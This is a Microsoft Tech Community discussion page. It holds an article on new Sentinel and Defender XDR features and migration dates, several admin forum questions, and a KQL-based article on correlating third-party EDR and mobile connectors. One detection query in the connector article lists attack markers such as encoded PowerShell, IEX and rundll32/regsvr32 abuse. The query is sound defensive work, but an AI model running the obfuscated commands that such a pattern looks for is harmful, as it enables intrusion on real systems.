Recent Discussions
What’s New in Microsoft Sentinel and XDR: AI Automation, Data Lake Innovation, and Unified SecOps
The most consequential “new” Microsoft Sentinel / Defender XDR narrative for a deeply technical Microsoft Tech Community article is the operational and engineering shift to unified security operations in the Microsoft Defender portal, including an explicit Azure portal retirement/sunset timeline and concrete migration implications (data tiering, correlation engine changes, schema differences, and automation behavior changes). Official sources now align on March 31, 2027 as the sunset date for managing Microsoft Sentinel in the Azure portal, with customers being redirected to the Defender portal after that date. The “headline” feature announcements to anchor your article around (because they create new engineering patterns, not just UI changes) are: AI playbook generator (preview): Natural-language-driven authoring of Python playbooks in an embedded VS Code environment (Cline), using Integration Profiles for dynamic API calls and an Enhanced Alert Trigger for broader automation triggering across Microsoft Sentinel, Defender, and XDR alert sources. CCF Push (public preview): A push-based connector model built on the Azure Monitor Logs Ingestion API, where deploying via Content Hub can automate provisioning of the typical plumbing (DCR/DCE/app registration/RBAC), enabling near-real-time ingestion plus ingestion-time transformations and (per announcement) direct delivery into certain system tables. Data lake tier ingestion for Advanced Hunting tables (GA): Direct ingestion of specific Microsoft XDR Advanced Hunting tables into the Microsoft Sentinel data lake without requiring analytics-tier ingestion—explicitly positioned for long-retention, cost-effective storage and retrospective investigations at scale. Microsoft 365 Copilot data connector (public preview): Ingests Copilot-related audit/activity events via the Purview Unified Audit Log feed into a dedicated table (CopilotActivity) with explicit admin-role requirements and cost notes. Multi-tenant content distribution expansion: Adds support for distributing analytics rules, automation rules, workbooks, and built-in alert tuning rules across tenants via distribution profiles, with stated limitations (for example, automation rules that trigger a playbook cannot currently be distributed). Alert schema differences for “standalone vs XDR connector”: A must-cite engineering artifact documenting breaking/behavioral differences (CompromisedEntity semantics, field mapping changes, alert filtering differences) when moving to the consolidated Defender XDR connector path. What’s new and when Feature and release matrix The table below consolidates officially documented Sentinel and Defender XDR features that are relevant to a “new announcements” technical article. If a source does not explicitly state GA/preview or a specific date, it is marked “unspecified.” Feature Concise description Status (official) Announcement / release date Azure portal Sentinel retirement / redirection Sentinel management experience shifts to Defender portal; sunset date extended; post-sunset redirection expected Date explicitly stated Mar 31, 2027 sunset (date stated) extension published Jan 29, 2026 Sentinel in Defender portal (core GA) Sentinel is GA in Defender portal, including for customers without Defender XDR/E5; unified SecOps surface GA Doc updated Sep 30, 2025; retirement note reiterated 2026 AI playbook generator Natural language → Python playbook, documentation, and a visual flow diagram; VS Code + Cline experience Preview Feb 23, 2026 Integration Profiles (playbook generator) Centralized configuration objects (base URL, auth method, credentials) used by generated playbooks to call external APIs dynamically Preview feature component Feb 23, 2026 Enhanced Alert Trigger (generated playbooks) Tenant-level trigger designed to target alerts across Sentinel + Defender + XDR sources and apply granular conditions Preview feature component Feb 23, 2026 CCF Push Push-based ingestion model that reduces setup friction (DCR/DCE/app reg/RBAC), built on Logs Ingestion API; supports transformations and high-throughput ingestion Public preview Feb 12–13, 2026 Legacy custom data collection API retirement Retirement of legacy custom data collection API noted as part of connector modernization Retirement date stated Sep 2026 (retirement) Data lake tier ingestion for Microsoft XDR Advanced Hunting tables Ingest selected Advanced Hunting tables from MDE/MDO/MDA directly into Sentinel data lake; supports long retention and lake-first analytics GA Feb 10, 2026 Microsoft 365 Copilot data connector Ingests Copilot activities/audit logs; data lands in CopilotActivity; requires specific tenant roles to enable; costs apply Public preview Feb 3, 2026 Multi-tenant content distribution: expanded content types Adds support for analytics rules, automation rules, workbooks, and built-in alert tuning rules; includes limitations and prerequisites Stated as “supported”; feature described as part of public preview experience in monthly update Jan 29, 2026 GKE dedicated connector Dedicated connector built on CCF; ingests GKE cluster activity/workload/security events into GKEAudit; supports DCR transformations and lake-only ingestion GA Mar 4, 2026 UEBA behaviors layer “Who did what to whom” behavior abstraction from raw logs; newer sources state GA; other page sections still label Preview GA and Preview labels appear in official sources (inconsistent) Feb 2026 (GA statement) UEBA widget in Defender portal home Home-page widget to surface anomalous user behavior and accelerate workflows Preview Jan 2026 Alert schema differences: standalone vs XDR connector Documents field mapping differences, CompromisedEntity behavior changes, and alert filtering/scoping differences Doc (behavioral/change reference) Feb 4, 2026 (last updated) Defender incident investigation: Blast radius analysis Graph visualization built on Sentinel data lake + graph for propagation path analysis Preview (per Defender XDR release notes) Sep 2025 (release notes section) Advanced hunting: Hunting graph Graph rendering of predefined threat scenarios in advanced hunting Preview (per Defender XDR release notes) Sep 2025 (release notes section) Sentinel repositories API version retirement “Call to action” to update API versions: older versions retired June 1, 2026; enforcement June 15, 2026 for actions Dates explicitly stated March 2026 (noticed); Jun 1 / Jun 15, 2026 (deadline/enforcement) Technical architecture and integrations Unified reference architecture Microsoft’s official integration documentation describes two “centers of gravity” depending on how you operate: In Defender portal mode, Sentinel data is ingested alongside organizational data into the Defender portal, enabling SOC teams to analyze and respond from a unified surface. In Azure portal mode, Defender XDR incidents/alerts flow via Sentinel connectors and analysts work across both experiences. Integration model: Defender suite and third-party security tools The Defender XDR integration doc is explicit about: Supported Defender components whose alerts appear through the integration (Defender for Endpoint, Identity, Office 365, Cloud Apps), plus other services such as Purview DLP and Entra ID Protection. Behavior when onboarding Sentinel to the Defender portal with Defender XDR licensing: the Defender XDR connector is automatically set up and component alert-provider connectors are disconnected. Expected latency: Defender XDR incidents typically appear in Sentinel UI/API within ~5 minutes, with additional lag before securityIncident ingestion is complete. Cost model: Defender XDR alerts and incidents that populate SecurityAlert / SecurityIncident are synchronized at no charge, while other data types (for example, Advanced Hunting tables) are charged. For third-party tools, Microsoft’s monthly “What’s new” explicitly calls out new GA out-of-the-box connectors/solutions (examples include Mimecast audit logs, Vectra AI XDR, and Proofpoint POD email security) as part of an expanding connector ecosystem intended to unify visibility across cloud, SaaS, and on-premises environments. Telemetry, schemas, analytics, automation, and APIs Data flows and ingestion engineering CCF Push and the “push connector” ingestion path Microsoft’s CCF Push announcement frames the “old” model as predominantly polling-based (Sentinel periodically fetching from partner/customer APIs) and introduces push-based connectors where partners/customers send data directly to a Sentinel workspace, emphasizing that “Deploy” can auto-provision the typical prerequisites: DCE, DCR, Entra app registration + secrets, and RBAC assignments. Microsoft also states that CCF Push is built on the Logs Ingestion API, with benefits including throughput, ingestion-time transformation, and system-table targeting. A precise engineering description of the underlying Logs Ingestion API components (useful for your article even if your readers never build a connector) is documented in Azure Monitor: Sender app authenticates via an app registration that has access to a DCR. Sender sends JSON matching the DCR’s expected structure to a DCR endpoint or a DCE (DCE required for Private Link scenarios). The DCR can apply a transformation to map/filter/enrich before writing to the target table. DCR transformation (KQL) Microsoft documents “transformations in Azure Monitor” and provides concrete sample KQL snippets for common needs such as cost reduction and enrichment. // Keep only Critical events source | where severity == "Critical" // Drop a noisy/unneeded column source | project-away RawData // Enrich with a simple internal/external IP classification (example) source | extend IpLocation = iff(split(ClientIp,".")[0] in ("10","192"), "Internal", "External") These are direct examples from Microsoft’s sample transformations guidance; they are especially relevant because ingestion-time filtering is one of the primary levers for both performance and cost management in Sentinel pipelines. A Sentinel-specific nuance: Microsoft states that Sentinel-enabled Log Analytics workspaces are not subject to Azure Monitor’s filtering ingestion charge, regardless of how much data a transformation filters (while other Azure Monitor transformation cost rules still exist in general). Telemetry schemas and key tables you should call out A “new announcements” article aimed at detection engineers should explicitly name the tables that are impacted by new features: Copilot connector → CopilotActivity table, with a published list of record types (for example, CopilotInteraction and related plugin/workspace/prompt-book operations) and explicit role requirements to enable (Global Administrator or Security Administrator). Defender XDR incident/alert sync → SecurityAlert and SecurityIncident populated at no charge; other Defender data types (Advanced Hunting event tables such as DeviceInfo/EmailEvents) are charged. Sentinel onboarding to Defender advanced hunting: Sentinel alerts tied to incidents are ingested into AlertInfo and accessible in Advanced hunting; SecurityAlert is queryable even if not shown in the schema list in Defender (notable for KQL portability). UEBA “core” tables (engineering relevance: query joins and tuning): IdentityInfo, BehaviorAnalytics, UserPeerAnalytics, Anomalies. UEBA behaviors layer tables (new behavior abstraction): SentinelBehaviorInfo and SentinelBehaviorEntities, created only if behaviors layer is enabled. Microsoft XDR Advanced Hunting lake tier ingestion GA: explicit supported tables from MDE/MDO/MDA (for example DeviceProcessEvents, DeviceNetworkEvents, EmailEvents, UrlClickEvents, CloudAppEvents) and an explicit note that MDI support will follow. Detection and analytics: UEBA and graph UEBA operating model and scoring Microsoft’s UEBA documentation gives you citeable technical detail: UEBA uses machine learning to build behavioral profiles and detect anomalies versus baselines, incorporating peer group analysis and “blast radius evaluation” concepts. Risk scoring is described with two different scoring models: BehaviorAnalytics.InvestigationPriority (0–10) vs Anomalies.AnomalyScore (0–1), with different processing characteristics (near-real-time/event-level vs batch/behavior-level). UEBA Essentials is positioned as a maintained pack of prebuilt queries (including multi-cloud anomaly detection), and Microsoft’s February 2026 update adds detail about expanded anomaly detection across Azure/AWS/GCP/Okta and the anomalies-table-powered queries. Sentinel data lake and graph as the new “analytics substrate” Microsoft’s data lake overview frames a two-tier model: Analytics tier: high-performance, real-time analytics supporting alerting/incident management. Data lake tier: centralized long-term storage for querying and Python-based analytics, designed for retention up to 12 years, with “single-copy” mirroring (data in analytics tier mirrored to lake tier). Microsoft’s graph documentation states that if you already have Sentinel data lake, the required graph is auto-provisioned when you sign into the Defender portal, enabling experiences like hunting graph and blast radius. Microsoft also notes that while the experiences are included in existing licensing, enabling data sources can incur ingestion/processing/storage costs. Automation: AI playbook generator details that matter technically The playbook generator doc contains unusually concrete engineering constraints and required setup. Key technical points to carry into your article: Prerequisites: Security Copilot must be enabled with SCUs available (Microsoft states SCUs aren’t billed for playbook generation but are required), and the Sentinel workspace must be onboarded to Defender. Roles: Sentinel Contributor is required for authoring Automation Rules, and a Detection tuning role in Entra is required to use the generator; permissions may take up to two hours to take effect. Integration Profiles: explicitly defined as Base URL + auth method + required credentials; cannot change API URL/auth method after creation; supports multiple auth methods including OAuth2 client credentials, API key, AWS auth, Bearer/JWT, etc. Enhanced Alert Trigger: designed for broader coverage across Sentinel, Defender, and XDR alerts and tenant-level automation consistency. Limitations: Python only, alerts as the sole input type, no external libraries, max 100 playbooks/tenant, 10-minute runtime, line limits, and separation of enhanced trigger rules from standard alert trigger rules (no automatic migration). APIs and code/CLI (official) Create/update a DCR with Azure CLI (official) Microsoft documents an az monitor data-collection rule create workflow to create/update a DCR from a JSON file, which is directly relevant if your readers build their own “push ingestion” paths outside of CCF Push or need transformations not supported via a guided connector UI. az monitor data-collection rule create \ --location 'eastus' \ --resource-group 'my-resource-group' \ --name 'my-dcr' \ --rule-file 'C:\MyNewDCR.json' \ --description 'This is my new DCR' Send logs via Azure Monitor Ingestion client (Python) (official) Microsoft’s Azure SDK documentation provides a straightforward LogsIngestionClient pattern (and the repo samples document the required environment variables such as DCE, rule immutable ID, and stream name). import os from azure.identity import DefaultAzureCredential from azure.monitor.ingestion import LogsIngestionClient endpoint = os.environ["DATA_COLLECTION_ENDPOINT"] rule_id = os.environ["LOGS_DCR_RULE_ID"] # DCR immutable ID stream_name = os.environ["LOGS_DCR_STREAM_NAME"] # stream name in DCR credential = DefaultAzureCredential() client = LogsIngestionClient(endpoint=endpoint, credential=credential) body = [ {"Time": "2026-03-18T00:00:00Z", "Computer": "host1", "AdditionalContext": "example"} ] # Actual upload method name/details depend on SDK version and sample specifics. # Refer to official ingestion samples and README for the exact call. The repo sample and README explicitly define the environment variables and the use of LogsIngestionClient + DefaultAzureCredential. Sentinel repositories API version retirement (engineering risk) Microsoft’s Sentinel release notes contain an explicit “call to action” that older REST API versions used for Sentinel Repositories will be retired (June 1, 2026) and that Source Control actions using older versions will stop being supported (starting June 15, 2026), recommending migration to specific versions. This is critical for “content-as-code” SOC engineering pipelines. Migration and implementation guidance Prerequisites and planning gates A technically rigorous migration section should treat this as a set of gating checks. Microsoft’s transition guidance highlights several that can materially block or change behavior: Portal transition has no extra cost: Microsoft explicitly states transitioning to the Defender portal has no extra cost (billing remains Sentinel consumption). Data storage and privacy policies change: after onboarding, Defender XDR policies apply even when working with Sentinel data (data retention/sharing differences). Customer-managed keys constraint for data lake: CMK is not supported for data stored in Sentinel data lake; even broader, Sentinel data lake onboarding doc warns that CMK-enabled workspaces aren’t accessible via data lake experiences and that data ingested into the lake is encrypted with Microsoft-managed keys. Region and data residency implications: data lake is provisioned in the primary workspace’s region and onboarding may require consent to ingest Microsoft 365 data into that region if it differs. Data appearance lag when switching tiers: enabling ingestion for the first time or switching between tiers can take 90–120 minutes for data to appear in tables. Step-by-step configuration tasks for the most “new” capabilities Enable lake-tier ingestion for Advanced Hunting tables (GA) Microsoft’s GA announcement provides direct UI steps in the Defender portal: Defender portal → Microsoft Sentinel → Configuration → Tables Select an Advanced Hunting table (from the supported list) Data Retention Settings → choose “Data lake tier” + set retention + save Microsoft states that this allows Defender data to remain accessible in the Advanced Hunting table for 30 days while a copy is sent to Sentinel data lake for long-term retention (up to 12 years) and graph/MCP-related scenarios. Deploy the Microsoft 365 Copilot data connector (public preview) Microsoft’s connector post provides the operational steps and requirements: Install via Content Hub in the Defender portal (search “Copilot”, install solution, open connector page). Enablement requires tenant-level Global Administrator or Security Administrator roles. Data lands in CopilotActivity. Ingestion costs apply based on Sentinel workspace settings or Sentinel data lake tier pricing. Configure multi-tenant content distribution (expanded content types) Microsoft documents: Navigate to “Content Distribution” in Defender multi-tenant management portal. Create/select a distribution profile; choose content types; select content; choose up to 100 workspaces per tenant; save and monitor sync results. Limitations: automation rules that trigger a playbook cannot currently be distributed; alert tuning rules limited to built-in rules (for now). Prerequisites: access to more than one tenant via delegated access; subscription to Microsoft 365 E5 or Office E5. Prepare for Defender XDR connector–driven changes Microsoft explicitly warns that incident creation rules are turned off for Defender XDR–integrated products to avoid duplicates and suggests compensating controls using Defender portal alert tuning or automation rules. It also warns that incident titles will be governed by Defender XDR correlation and recommends avoiding “incident name” conditions in automation rules (tags recommended). Common pitfalls and “what breaks” A strong engineering article should include a “what breaks” section, grounded in Microsoft’s own lists: Schema and field semantics drift: The “standalone vs XDR connector” schema differences doc calls out CompromisedEntity behavior differences, field mapping changes, and alert filtering differences (for example, Defender for Cloud informational alerts not ingested; Entra ID below High not ingested by default). Automation delays and unsupported actions post-onboarding: Transition guidance states automation rules might run up to 10 minutes after alert/incident changes due to forwarding, and that some playbook actions (like adding/removing alerts from incidents) are not supported after onboarding—breaking certain playbook patterns. Incident synchronization boundaries: incidents created in Sentinel via API/Logic App playbook/manual Azure portal aren’t synchronized to Defender portal (per transition doc). Advanced hunting differences after data lake enablement: auxiliary log tables are no longer available in Defender Advanced hunting once data lake is enabled; they must be accessed via data lake exploration KQL experiences. CI/CD failures from API retirement: repository connection create/manage tooling that calls older API versions must migrate by June 1, 2026 to avoid action failures. Performance and cost considerations Microsoft’s cost model is now best explained using tiering and retention: Sentinel data lake tier is designed for cost-effective long retention up to 12 years, with analytics-tier data mirrored to the lake tier as a single copy. For Defender XDR threat hunting data, Microsoft states it is available in analytics tier for 30 days by default; retaining beyond that and moving beyond free windows drives ingestion and/or storage costs depending on whether you extend analytics retention or store longer in lake tier. Ingesting data directly to data lake tier incurs ingestion, storage, and processing costs; retaining in lake beyond analytics retention incurs storage costs. Ingestion-time transformations are a first-class cost lever, and Microsoft explicitly frames filtering as a way to reduce ingestion costs in Log Analytics. Sample deployment checklist Phase Task Acceptance criteria (engineering) Governance Confirm target portal strategy and dates Internal cutover plan aligns with March 31, 2027 retirement; CI/CD deadlines tracked Identity/RBAC Validate roles for onboarding + automation Required Entra roles + Sentinel roles assigned; propagation delays accounted for Data lake readiness Decide whether to onboard to Sentinel data lake CMK policy alignment confirmed; billing subscription owner identified; region implications reviewed Defender XDR integration Choose integration mode and test incident sync Incidents visible within expected latency; bi-directional sync fields behave as expected Schema regression Validate queries/rules against XDR connector schema KQL regression tests pass; CompromisedEntity and filtering changes handled Connector modernization Inventory connectors; plan CCF / CCF Push transitions Function-based connectors migration plan; legacy custom data collection API retirement addressed Automation Pilot AI playbook generator + enhanced triggers Integration Profiles created; generated playbooks reviewed; enhanced trigger scopes correct Multi-tenant operations Configure content distribution if needed Distribution profiles sync reliably; limitations documented; rollback/override plan exists Outage-proofing Update Sentinel repos tooling for API retirement All source-control actions use recommended API versions before June 1, 2026 Use cases and customer impact Detection and response scenarios that map to the new announcements Copilot governance and misuse detection The Copilot connector’s published record types enable detections for scenarios such as unauthorized plugin/workspace/prompt-book operations and anomalous Copilot interactions. Data is explicitly positioned for analytic rules, workbooks, automation, and threat hunting within Sentinel and Sentinel data lake. Long-retention hunting on high-volume Defender telemetry (lake-first approach) Lake-tier ingestion for Advanced Hunting tables (GA) is explicitly framed around scale, cost containment, and retrospective investigations beyond “near-real-time” windows, while keeping 30-day availability in the Advanced Hunting tables themselves. Faster automation authoring and customization (SOAR engineering productivity) Microsoft positions the playbook generator as eliminating rigid templates and enabling dynamic API calls across Microsoft and third-party tools via Integration Profiles, with preview-customer feedback claiming faster automation development (vendor-stated). Multi-tenant SOC standardization (MSSP / large enterprise) Multi-tenant content distribution is explicitly designed to replicate detections, automation, and dashboards across tenants, reducing drift and accelerating onboarding, while keeping execution local to target tenants. Measurable benefit dimensions (how to discuss rigorously) Most Microsoft sources in this announcement set are descriptive (not benchmark studies). A rigorous article should therefore describe what you can measure, and label any numeric claims as vendor-stated. Recommended measurable dimensions grounded in the features as documented: Time-to-detect / time-to-ingest: CCF Push is positioned as real-time, event-driven delivery vs polling-based ingestion. Time-to-triage / time-to-investigate: UEBA layers (Anomalies + Behaviors) are designed to summarize and prioritize activity, with explicit scoring models and tables for query enrichment. Incident queue pressure: Defender XDR grouping/enrichment is explicitly described as reducing SOC queue size and time to resolve. Cost-per-retained-GB and query cost: tiering rules and retention windows define cost tradeoffs; ingestion-time transformations reduce cost by dropping unneeded rows/columns. Vendor-stated metrics: Microsoft’s March 2026 “What’s new” roundup references an external buyer’s guide and reports “44% reduction in total cost of ownership” and “93% faster deployment times” as outcomes for organizations using Sentinel (treat as vendor marketing unless corroborated by an independent study in your environment). Comparison of old vs new Microsoft capabilities and competitor XDR positioning Old vs new (Microsoft) Capability “Older” operating model (common patterns implied by docs) “New” model emphasized in announcements/release notes Primary SOC console Split experience (Azure portal Sentinel + Defender portal XDR) Defender portal as the primary unified SecOps surface; Azure portal sunset Incident correlation engine Sentinel correlation features (e.g., Fusion in Azure portal) Defender XDR correlation engine replaces Fusion for incident creation after onboarding; incident provider always “Microsoft XDR” in Defender portal mode Automation authoring Logic Apps playbooks + automation rules Adds AI playbook generator (Python) + Enhanced Alert Trigger, with explicit constraints/limits Custom ingestion Data Collector API legacy patterns + manual DCR/DCE plumbing CCF Push built on Logs Ingestion API; emphasizes automated provisioning and transformation support Long retention Primarily analytics-tier retention strategies Data lake tier supports up to 12 years; lake-tier ingestion for AH tables GA; explicit tier/cost model Graph-driven investigations Basic incident graphs Blast radius analysis + hunting graph experiences built on Sentinel data lake + graph Competitor XDR offerings (high-level, vendor pages) The table below is intentionally “high-level” and marks details as unspecified unless explicitly stated on the cited vendor pages. Vendor Positioning claims (from official vendor pages) Notes / unspecified items CrowdStrike Falcon Insight XDR is positioned as “AI-native XDR” for “endpoint and beyond,” emphasizing detection/response and threat intelligence. Data lake architecture, ingestion transformation model, and multi-tenant content distribution specifics are unspecified in cited sources. Palo Alto Networks Cortex XDR is positioned as integrated endpoint security with AI-driven operations and broader visibility; vendor site highlights outcome metrics in customer stories and “AI-driven endpoint security.” Lake/graph primitives, connector framework model, and schema parity details are unspecified in cited sources. SentinelOne Singularity XDR is positioned as AI-powered response with automated workflows across the environment; emphasizes machine-speed incident response. Specific SIEM-style retention tiering and documented ingestion-time transformations are unspecified in cited sources.Intune device compliance status not evaluated
Has anyone encountered devices taking absolutely forever to evaluate overall compliance after user enrollment ESP? (pre-provisioned devices). They just sit there in "not evaluated" and get blocked by CA policy. Most come good eventually, but some literally are taking employees offline for the whole day. These are all Win11 AAD-joined. Microsoft has only offered me the standard "may take up to 8 hours, goodbye" response but I am pulling my hair out trying to figure out if this is just an Intune thing, or is there a trick I am missing? Some of them take so long that I give up and swap out the device so they can start working. The individual policies are evaluating just fine, but the overall status is way behind. I'd even prefer them to be non-compliant because at least then the grace period would kick in. I have had very limited success with rebooting and kicking off all the syncs / check access buttons, but I have a feeling those buttons have just been a placebo. It happens very sporadically too on about half of devices the user doesn't even notice it's that quick. Thanks for any advice8KViews0likes5CommentsWhy there is no Signature status for the new process in the DeviceProcessEvent table?
According to the schema, there is only field for checking the initiating (parent) process digital signature, named InitiatingProcessSignatureStatus. So we have information if the process that initiated the execution is signed. However, in many security use-cases it is important to know if the spawned (child) process is digitally signed. Let's assume that Winword.exe (signed) executed unsigned binary - this is definitely different situation than Winword.exe executing some signed binary (although both may be suspicious, or legitimate). I feel that some valuable information is not provided, and I'd like to know the reason. Is it related to the logging performance? Or some memory structures, that are present only for the already existing process?108Views0likes2CommentsRoadmap for TVM network devices?
I see that agent based scanning for network devices is being deprecated for Defender TVM in November this year. It's not clear what the replacement solution to this will be - while the product support is not exhaustive, for perimeter devices getting TVM information as part of the Defender for Cloud for Servers license is a valuable addition. Is there any roadmap information, or documentation that outlines how we'll be able to achieve the same outcome of TVM information for network devices for weaknesses and threats? I've been looking but cannot find a clear direction on this or whether I'll need to start looking at 3rd party for TVM on network devices.146Views0likes1CommentIntegrate Defender for Cloud Apps w/ Azure Firewall or VPN Gateway
Hello, Recently I have been tasked with securing our openAI implementation. I would like to marry the Defender for Cloud Apps with the sanctioning feature and the Blocking unsanctioned traffic like the Defender for Endpoint capability. To do this, I was only able to come up with: creating a windows 2019/2022 server, with RRAS, and two interfaces in Azure, one Public, and one private. Then I add Defender for Endpoint, Optimized to act as a traffic moderator, integrated the solution with Defender for cloud apps, with BLOCK integration enabled. I can then sanction each of the desired applications, closing my environment and only allowing sanctioned traffic to sanctioned locations. This solution seemed : difficult to create, not the best performer, and the solution didn't really take into account the ability of the router to differentiate what solution was originating the traffic, which would allow for selective profiles depending on the originating source. Are there any plans on having similar solutions available in the future from: VPN gateway (integration with Defender for Cloud Apps), or Azure Firewall -> with advanced profile. The Compliance interface with the sanctioning traffic feature seems very straight forward .178Views0likes1CommentEndpoint and EDR Ecosystem Connectors in Microsoft Sentinel
Most SOCs operate in mixed endpoint environments. Even if Microsoft Defender for Endpoint is your primary EDR, you may still run Cisco Secure Endpoint, WithSecure Elements, Knox, or Lookout in specific regions, subsidiaries, mobile fleets, or regulatory enclaves. The goal is not to replace any tool, but to standardize how signals become detections and response actions. This article explains an engineering-first approach: ingestion correctness, schema normalization, entity mapping, incident merging, and cross-platform response orchestration. Think of these connectors as four different lenses on endpoint risk. Two provide classic EDR detections (Cisco, WithSecure). Two provide mobile security and posture signals (Knox, Lookout). The highest-fidelity outcomes come from correlating them with Microsoft signals (Defender for Endpoint device telemetry, Entra ID sign-ins, and threat intelligence). Cisco Secure Endpoint Typical signal types include malware detections, exploit prevention events, retrospective detections, device isolation actions, and file/trajectory context. Cisco telemetry is often hash-centric (SHA256, file reputation) which makes it excellent for IOC matching and cross-EDR correlation. WithSecure Elements WithSecure Elements tends to provide strong behavioral detections and ransomware heuristics, often including process ancestry and behavioral classification. It complements hash-based detections by providing behavior and incident context that can be joined to Defender process events. Samsung Knox Asset Intelligence Knox is posture-heavy. Typical signals include compliance state, encryption status, root/jailbreak indicators, patch level, device model identifiers and policy violations. This data is extremely useful for identity correlation: it helps answer whether a successful sign-in came from a device that should be trusted. Lookout Mobile Threat Defense Lookout focuses on mobile threats such as malicious apps, phishing, risky networks (MITM), device compromise indicators, and risk scores. Lookout signals are critical for identity attack chains because mobile phishing is often the precursor to token theft or credential reuse. 2. Ingestion architecture: from vendor API to Sentinel tables Most third‑party connectors are API-based. In production, treat ingestion as a pipeline with reliability requirements. The standard pattern is vendor API → connector runtime (codeless connector or Azure Function) → DCE → DCR transform → Log Analytics table. Key engineering controls: Secrets and tokens should be stored in Azure Key Vault where supported; rotate and monitor auth failures. Use overlap windows (poll slightly more than the schedule interval) and deduplicate by stable event IDs. Use DCR transforms to normalize fields early (device/user/IP/severity) and to filter obviously low-value noise. Monitor connector health and ingestion lag; do not rely on ‘Connected’ status alone. Ingestion health checks (KQL) // Freshness & lag per connector table (adapt table names to your workspace) let lookback = 24h union isfuzzy=true (<CiscoTable> | extend Source="Cisco"), (<WithSecureTable> | extend Source="WithSecure"), (<KnoxTable> | extend Source="Knox"), (<LookoutTable> | extend Source="Lookout") | where TimeGenerated > ago(lookback) | summarize LastEvent=max(TimeGenerated), Events=count() by Source | extend IngestDelayMin = datetime_diff("minute", now(), LastEvent) | order by IngestDelayMin desc // Schema discovery (run after onboarding and after connector updates) Cisco | take 1 | getschema WithSecureTable | take 1 | getschema Knox | take 1 | getschema Lookout | take 1 | getschema 3. Normalization: make detections vendor-agnostic The most common failure mode in multi-EDR SOCs is writing separate rules per vendor. Instead, build one normalization function that outputs a stable schema. Then write rules once. Recommended canonical fields: Vendor, AlertId, EventTime, SeverityNormalized DeviceName (canonical), AccountUpn (canonical), SourceIP FileHash (when applicable), ThreatName/Category CorrelationKey (stable join key such as DeviceName + FileHash or DeviceName + AlertId) // Example NormalizeEndpoint() pattern. Replace column_ifexists(...) mappings after getschema(). let NormalizeEndpoint = () { union isfuzzy=true ( Cisco | extend Vendor="Cisco" | extend DeviceName=tostring(column_ifexists("hostname","")), AccountUpn=tostring(column_ifexists("user","")), SourceIP=tostring(column_ifexists("ip","")), FileHash=tostring(column_ifexists("sha256","")), ThreatName=tostring(column_ifexists("threat_name","")), SeverityNormalized=tolower(tostring(column_ifexists("severity",""))) ), ( WithSecure | extend Vendor="WithSecure" | extend DeviceName=tostring(column_ifexists("hostname","")), AccountUpn=tostring(column_ifexists("user","")), SourceIP=tostring(column_ifexists("ip","")), FileHash=tostring(column_ifexists("file_hash","")), ThreatName=tostring(column_ifexists("classification","")), SeverityNormalized=tolower(tostring(column_ifexists("risk_level",""))) ), ( Knox | extend Vendor="Knox" | extend DeviceName=tostring(column_ifexists("device_id","")), AccountUpn=tostring(column_ifexists("user","")), SourceIP="", FileHash="", ThreatName=strcat("Device posture: ", tostring(column_ifexists("compliance_state",""))), SeverityNormalized=tolower(tostring(column_ifexists("risk",""))) ), ( Lookout | extend Vendor="Lookout" | extend DeviceName=tostring(column_ifexists("device_id","")), AccountUpn=tostring(column_ifexists("user","")), SourceIP=tostring(column_ifexists("source_ip","")), FileHash="", ThreatName=tostring(column_ifexists("threat_type","")), SeverityNormalized=tolower(tostring(column_ifexists("risk_level",""))) ) | extend CorrelationKey = iff(isnotempty(FileHash), strcat(DeviceName, "|", FileHash), strcat(DeviceName, "|", ThreatName)) | project TimeGenerated, Vendor, DeviceName, AccountUpn, SourceIP, FileHash, ThreatName, SeverityNormalized, CorrelationKey, * } 4. Entity mapping and incident merging Sentinel’s incident experience improves dramatically when alerts include entity mapping. Map Host, Account, IP, and File (hash) where possible. Incident grouping should merge alerts by DeviceName and AccountUpn within a reasonable window (e.g., 6–24 hours) to avoid alert storms. 5. Correlation patterns that raise confidence High-confidence detections come from confirmation across independent sensors. These patterns reduce false positives while catching real compromise chains. 5.1 Multi-vendor confirmation (two EDRs agree) NormalizeEndpoint() | where TimeGenerated > ago(24h) | summarize Vendors=dcount(Vendor), VendorSet=make_set(Vendor, 10) by DeviceName | where Vendors >= 2 5.2 Third-party detection confirmed by Defender process telemetry let tp = NormalizeEndpoint() | where TimeGenerated > ago(6h) | where ThreatName has_any ("powershell","ransom","credential","exploit") | project TPTime=TimeGenerated, DeviceName, AccountUpn, Vendor, ThreatName tp | join kind=inner ( DeviceProcessEvents | where Timestamp > ago(6h) | where ProcessCommandLine has_any ("EncodedCommand","IEX","FromBase64String","rundll32","regsvr32") | project MDETime=Timestamp, DeviceName=tostring(DeviceName), Proc=ProcessCommandLine ) on DeviceName | where MDETime between (TPTime .. TPTime + 30m) | project TPTime, MDETime, DeviceName, Vendor, ThreatName, Proc 5.3 Mobile phishing signal followed by successful sign-in let mobile = NormalizeEndpoint() | where TimeGenerated > ago(24h) | where Vendor == "Lookout" and ThreatName has "phish" | project MTDTime=TimeGenerated, AccountUpn, DeviceName, SourceIP mobile | join kind=inner ( SigninLogs | where TimeGenerated > ago(24h) | where ResultType == 0 | project SigninTime=TimeGenerated, AccountUpn=tostring(UserPrincipalName), IPAddress, AppDisplayName ) on AccountUpn | where SigninTime between (MTDTime .. MTDTime + 30m) | project MTDTime, SigninTime, AccountUpn, DeviceName, SourceIP, IPAddress, AppDisplayName 5.4 Knox posture and high-risk sign-in let noncompliant = NormalizeEndpoint() | where TimeGenerated > ago(7d) | where Vendor=="Knox" and ThreatName has "NonCompliant" | project DeviceName, AccountUpn, KnoxTime=TimeGenerated noncompliant | join kind=inner ( SigninLogs | where TimeGenerated > ago(7d) | where RiskLevelDuringSignIn in ("high","medium") | project SigninTime=TimeGenerated, AccountUpn=tostring(UserPrincipalName), RiskLevelDuringSignIn, IPAddress ) on AccountUpn | where SigninTime between (KnoxTime .. KnoxTime + 2h) | project KnoxTime, SigninTime, AccountUpn, DeviceName, RiskLevelDuringSignIn, IPAddress 6. Response orchestration (SOAR) design Response should be consistent across vendors. Use a scoring model to decide whether to isolate a device, revoke tokens, or enforce Conditional Access. Prefer reversible actions, and log every automation step for audit. 6.1 Risk scoring to gate playbooks let SevScore = (s:string) { case(s=="critical",5,s=="high",4,s=="medium",2,1) } NormalizeEndpoint() | where TimeGenerated > ago(24h) | extend Score = SevScore(SeverityNormalized) | summarize RiskScore=sum(Score), Alerts=count(), Vendors=make_set(Vendor, 10) by DeviceName, AccountUpn | where RiskScore >= 8 | order by RiskScore desc High-severity playbooks typically execute: (1) isolate device via Defender (if onboarded), (2) revoke tokens in Entra ID, (3) trigger Conditional Access block, (4) notify and open ITSM ticket. Medium-severity playbooks usually tag the incident, add watchlist 